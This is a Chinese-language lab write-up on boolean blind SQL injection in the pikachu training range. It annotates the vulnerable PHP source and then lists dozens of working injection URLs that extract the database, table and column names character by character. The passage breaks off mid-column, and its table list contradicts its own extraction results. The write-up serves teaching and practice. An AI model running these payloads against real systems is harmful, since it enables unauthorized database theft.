目录
一、SQL注入
二、布尔盲注
三、源码分析
四、渗透实战
1、SQL注入探测
(1)输入已有账户
(2)输入不存在账户
(3)输入单引号等可能报错的情况
2、手工注入
(1)探测数据库名
(2)探测表名
(3)探测列名
(4)探测数据
3、sqlmap渗透
本系列为通过《pikachu靶场通关笔记》的SQL注入关卡(共10关)渗透集合,通过对布尔盲注(base on boolian)关卡源码的代码审计找到SQL注入风险的真实原因,讲解布尔盲注(base on boolian)的原理并进行渗透实践,本文为SQL注入09之布尔盲注(base on boolian)关卡的渗透部分。
一、SQL注入
SQL注入攻击主要形成的原因是在进行SQL数据语句交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
二、布尔盲注
布尔盲注是 SQL 注入攻击中的一种技术,当应用程序在执行 SQL 查询后,仅返回两种不同的结果(如页面正常显示或异常显示、返回 “true” 或 “false”),而不返回详细的数据库错误信息或查询结果时,攻击者可以利用这种特性,通过构造一系列布尔条件查询,根据应用程序的响应情况来推断数据库中的信息,逐步获取数据库的敏感内容。
布尔盲注的核心原理是利用 SQL 语句中的布尔表达式进行条件判断。攻击者通过不断构造不同的布尔条件,观察应用程序的响应结果(如页面状态、返回内容等)来确定条件是否成立,从而逐步获取数据库的信息,如数据库名、表名、列名和数据内容等。
布尔盲注的渗透步骤如下所示。
| 步骤 | 具体操作 |
|---|---|
| 判断注入点 | 提交特殊字符(如单引号')观察应用程序响应,若页面异常(报错、显示异常信息等),可能存在注入点 |
| 确定数据库长度 | 构造布尔条件,不断尝试不同长度值,根据应用程序响应(正常显示表示条件成立,异常显示表示不成立)确定数据库名长度 |
| 逐字符获取数据库名 | 使用SUBSTRING截取字符,ASCII转换为 ASCII 码,不断尝试不同 ASCII 码值,根据响应确定该位置字符 |
| 获取表名长度 | 从information_schema表中获取表名长度,构造布尔条件,尝试不同长度值确定第一个表名长度 |
| 逐字符获取表名 | 类似获取数据库名,从information_schema表中逐字符获取表名 |
| 获取列名和数据 | 重复上述逐字符获取的方法,从information_schema表中获取列名,进而获取数据 |
三、源码分析
打开pikachu靶场的SQL注入-布尔盲注型关卡对应的源码sqli_blind_b.php,具体如下所示。
这段 PHP 代码实现了一个简单的用户信息查询功能。当用户通过 GET 方法提交包含 submit 参数和 name 参数的表单时,代码会将 name 参数的值直接拼接到 SQL 查询语句中,从 member 表中查询 username 等于该值的记录的 id 和 email 信息。如果查询到一条记录,则将该记录的 id 和 email 信息以 HTML 段落的形式显示出来;如果没有查询到记录,则提示用户输入的 username 不存在。经过注释后的代码如下所示。
<?php
// 调用 connect 函数建立与数据库的连接,并将连接对象赋值给变量 $link
$link = connect();// 初始化用于存储 HTML 内容的变量,用于后续显示查询结果或提示信息
$html = '';// 检查是否通过 GET 方法提交了表单,并且表单中名为 'name' 的字段不为空
if (isset($_GET['submit']) && $_GET['name'] != null) {// 直接获取用户通过 GET 方法提交的 'name' 参数值,未做任何处理$name = $_GET['name'];// 构造一个 SQL 查询语句,用于从 member 表中选取 username 等于用户输入值的记录的 id 和 email 字段// 由于 'name' 是字符型,在 SQL 语句中需要用单引号括起来,这里存在 SQL 注入风险$query = "select id,email from member where username='$name'";// 使用 mysqli_query 函数执行构造好的 SQL 查询语句// mysqli_query 函数执行查询时不会打印详细的错误描述,这使得即使存在注入也较难判断$result = mysqli_query($link, $query);// 检查查询结果集是否有效,并且结果集中的行数是否为 1if ($result && mysqli_num_rows($result) == 1) {// 当结果集中有且仅有一条记录时,使用 while 循环逐行获取结果集的数据while ($data = mysqli_fetch_assoc($result)) {// 从关联数组 $data 中获取 'id' 字段的值,并赋值给变量 $id$id = $data['id'];// 从关联数组 $data 中获取 'email' 字段的值,并赋值给变量 $email$email = $data['email'];// 将用户信息拼接成 HTML 字符串,添加到变量 $html 中$html .= "<p class='notice'>your uid:{$id} <br />your email is: {$email}</p>";}} else {// 如果结果集中没有记录或者查询失败,将提示信息拼接成 HTML 字符串,添加到变量 $html 中$html .= "<p class='notice'>您输入的 username 不存在,请重新输入!</p>";}
}
?>代码存在 SQL 布尔注入安全风险,关键在于对用户通过 GET 方法提交的 name 参数未做任何处理。直接把 $_GET['name'] 拼接到 SQL 查询语句里,没有对其进行有效性验证和过滤。攻击者能够利用SQL注入风险,构造特殊的输入改变 SQL 语句的逻辑,通过判断页面返回的不同提示信息(查询到记录和未查询到记录的提示)来逐步获取数据库中的敏感信息。
四、渗透实战
1、SQL注入探测
(1)输入已有账户
如下所示,当输入存在的账户时,输出账户的id和邮箱地址。
(2)输入不存在账户
当输入不存在的账户时,以输入“mooyuan---”为主,提示“您输入的username不存在,请重新输入”,如下所示。
(3)输入单引号等可能报错的情况
当输入单引号时,原本在第02关等会出现SQL报错信息的情况,在本关卡没有报错信息,只是提示“您输入的username不存在,请重新输入”,如下所示。
对比第2关卡同样的单引号输入后,字符型会出现报错,如下所示。
2、手工注入
(1)探测数据库名
如下所示,数据库名的长度为7,名字为pikachu。
[+] 第一步:探测数据库名
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH(DATABASE()) = 7) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
数据库名长度:7
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING(DATABASE(), 1, 1) = 'p') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING(DATABASE(), 2, 1) = 'i') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING(DATABASE(), 3, 1) = 'k') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING(DATABASE(), 4, 1) = 'a') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING(DATABASE(), 5, 1) = 'c') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING(DATABASE(), 6, 1) = 'h') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING(DATABASE(), 7, 1) = 'u') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
数据库名:pikachu(2)探测表名
如下所示,pikachu数据库共有5个表格,分别为emails,httpinfo,member,users和xss_blind。
[+] 第二步:探测表信息
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN ((SELECT COUNT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu') > 4) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN ((SELECT COUNT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu') = 5) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
表数量:5
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1)) = 8) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 表名长度: 8
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1), 1, 1) = 'h') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1), 2, 1) = 't') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1), 3, 1) = 't') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1), 4, 1) = 'p') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1), 5, 1) = 'i') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1), 6, 1) = 'n') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1), 7, 1) = 'f') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1), 8, 1) = 'o') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询表 1: httpinfo
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 1,1)) > 4) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 1,1)) = 6) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 表名长度: 6
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 1,1), 1, 1) = 'm') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 1,1), 2, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 1,1), 3, 1) = 'm') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 1,1), 4, 1) = 'b') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 1,1), 5, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 1,1), 6, 1) = 'r') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询表 2: member
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1)) > 4) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1)) > 6) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1)) = 7) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 表名长度: 7
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1), 1, 1) = 'm') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1), 2, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1), 3, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1), 4, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1), 5, 1) = 'a') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1), 6, 1) = 'g') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1), 7, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询表 3: message
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 3,1)) > 4) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 3,1)) = 5) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 表名长度: 5
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 3,1), 1, 1) = 'u') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 3,1), 2, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 3,1), 3, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 3,1), 4, 1) = 'r') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 3,1), 5, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询表 4: users
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1)) = 8) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 表名长度: 8
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1), 1, 1) = 'x') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1), 2, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1), 3, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1), 4, 1) = 'b') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1), 5, 1) = 'l') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1), 6, 1) = 'i') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1), 7, 1) = 'n') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1), 8, 1) = 'd') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询表 5: xssblind(3)探测列名
如下所示,users表共有四列,分别为id,username,password和level。
[+] 第三步:探测表 users 的列
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN ((SELECT COUNT(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users') = 4) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
列数量:4
[*] 正在探测表 users 的第 1 列名...
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 0,1)) = 2) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 列名长度: 2
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 0,1), 1, 1) = 'i') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 0,1), 2, 1) = 'd') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询[+] 列名: id
列 1: id
[*] 正在探测表 users 的第 2 列名...
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1)) = 8) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 列名长度: 8
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1), 1, 1) = 'u') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1), 2, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1), 3, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1), 4, 1) = 'r') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1), 5, 1) = 'n') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1), 6, 1) = 'a') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1), 7, 1) = 'm') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1), 8, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询[+] 列名: username
列 2: username
[*] 正在探测表 users 的第 3 列名...
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1)) = 8) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 列名长度: 8
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1), 1, 1) = 'p') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1), 2, 1) = 'a') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1), 3, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1), 4, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1), 5, 1) = 'w') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
